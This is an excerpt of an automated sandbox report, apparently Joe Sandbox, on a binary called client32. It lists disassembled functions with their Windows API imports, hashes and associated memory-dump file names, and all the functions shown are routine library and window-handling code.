String ID:
API String ID: 3347742789-0
Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0

Function 11179775 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
__isleadbyte_l.LIBCMT ref: 111797DC
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51

Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,B6DE5DE1,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
SetEvent.KERNEL32(?), ref: 110B37EA
LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90

Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,B6DE5DE1,00000000,00002710,00000001,11027140,B6DE5DE1,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A

SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
IsWindow.USER32(00000000), ref: 110436DE
GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$CriticalEnterLongMessageRectSectionSend
String ID:
API String ID: 3558565530-0
Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54

Function 1103FD50 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CloseHandle.KERNEL32(00000000,1105E2A0,00000001,00000000), ref: 1103FE23

Part of subcall function 1105D500: EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
Part of subcall function 1105D500: LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,B6DE5DE1), ref: 1105D59E
Part of subcall function 1105D500: SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,B6DE5DE1), ref: 1105D5A8

Strings

DisableWatch, xrefs: 1103FD81
Client, xrefs: 1103FD86, 1103FDA1
DisableThumbnail, xrefs: 1103FD9C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseEnterEventHandleLeave__wcstoi64
String ID: Client$DisableThumbnail$DisableWatch
API String ID: 2471723077-3419801620
Opcode ID: d72c5556efcb539d19dc230ea8d14fd97c16424b454e1bf7ce894eb50292d4e8
Instruction ID: 874e8ed0e68c429b6896bcce41397a88f00d8469b1ceffe9eaa788a166db293c
Opcode Fuzzy Hash: d72c5556efcb539d19dc230ea8d14fd97c16424b454e1bf7ce894eb50292d4e8
Instruction Fuzzy Hash: 2421D075E00656AFDB10CF65CC44BABF7A8EB80719F004179FD199B281E770A90087A6

Function 110B3810 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,B6DE5DE1,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B383F
LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B385E
SetEvent.KERNEL32(?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38A4
LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38AB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
Instruction ID: 58af85e25f85a47ca3d7134065c146d8b9d4bc60aa5d6e9c2c74ed7e6f1a2d6e
Opcode Fuzzy Hash: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
Instruction Fuzzy Hash: 1C21DF72A047089FD315CFA8D884B9AF7E8FB48315F104A3EE816C7A04E739B404CB94

Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,?), ref: 11143091
SetRect.USER32(?,?,?,?,?), ref: 111430A9
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
SetBkColor.GDI32(?,00000000), ref: 111430C8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$RectText
String ID:
API String ID: 4034337308-0
Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5

Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 110675BB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
DispatchMessageA.USER32(?), ref: 110675F6
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchEvent
String ID:
API String ID: 4257095537-0
Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0

Function 1112FA70 Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(00000000,00000000,00000032,1112DED0), ref: 1112FA95
KillTimer.USER32(00000000,00000000,00000000,?,1104C487,00000000,00000000,?), ref: 1112FABC
GetDlgItem.USER32(?,00000477), ref: 1112FAEB
EnableWindow.USER32(00000000,00000000), ref: 1112FAF9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Timer$EnableItemKillWindow
String ID:
API String ID: 676886422-0
Opcode ID: d20084cb4f25a9579ec7177c618f8d0557ffb4e4c810970510a0c0949c4120d2
Instruction ID: b2a971e49da68126fa2f0839c5b5ec95ad31f3931a39238c89cadfd705407f6d
Opcode Fuzzy Hash: d20084cb4f25a9579ec7177c618f8d0557ffb4e4c810970510a0c0949c4120d2
Instruction Fuzzy Hash: 9E01B1746022339FD7099FD5C5D9BA6FBA8F74570CF54413AE825C7288E7709844CBA1

Function 11085D50 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,00000010,00000000,?,?,?), ref: 11085D68
CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,00000010,00000000,?,?,?), ref: 11085D7B
CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,00000010,00000000,?,?,?), ref: 11085D8E
FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11086390,?,11032002,00000010,00000000,?,?,?), ref: 11085DA1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$FreeLibrary
String ID:
API String ID: 736098846-0
Opcode ID: a47e63825ae0099003c4f17b3259cc108d40f6e554c9d41b5282e684e3653e62
Instruction ID: b343c14c5c17b63c7a4bd58d7712c93af324cd3a18d5a4227ff05bd7e2b4b0ce
Opcode Fuzzy Hash: a47e63825ae0099003c4f17b3259cc108d40f6e554c9d41b5282e684e3653e62
Instruction Fuzzy Hash: 87F0E2B1E00B108BD221DFBEC8C4AC6FBE9BF89310F60091AE5AED3214C771A4418B54

Function 1109DD40 Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00002710,00000000,00000000,11031EC1,00000000,00000006,11067736,0000048C,00000001,00000000,NSMWClass,B6DE5DE1), ref: 1109DD63
SetEvent.KERNEL32(?), ref: 1109DD69
WaitForSingleObject.KERNEL32(?,00002710), ref: 1109DD78
CloseHandle.KERNEL32(?), ref: 1109DD7E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ObjectSingleWait$CloseEventHandle
String ID:
API String ID: 1408678129-0
Opcode ID: 3a80bbf2638a870254e971a8dc6b0a58e99ad6add4d57f1c25d7aea544caf377
Instruction ID: 267bb2006f14c4d98e6956b85a170549b425f12ea211a164831c8047c67e7bc1
Opcode Fuzzy Hash: 3a80bbf2638a870254e971a8dc6b0a58e99ad6add4d57f1c25d7aea544caf377
Instruction Fuzzy Hash: 01F05E356407149BE324DBADC994A27F7E9AF98710B05892DE5AAC3A50C6B1F840CB90

Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
GlobalDeleteAtom.KERNEL32 ref: 1115F212
GlobalDeleteAtom.KERNEL32 ref: 1115F21C
SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomDeleteGlobal$LongWindow
String ID:
API String ID: 964255742-0
Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70

Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
SetFocus.USER32(?), ref: 11007403

Strings

edit, xrefs: 110073A1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

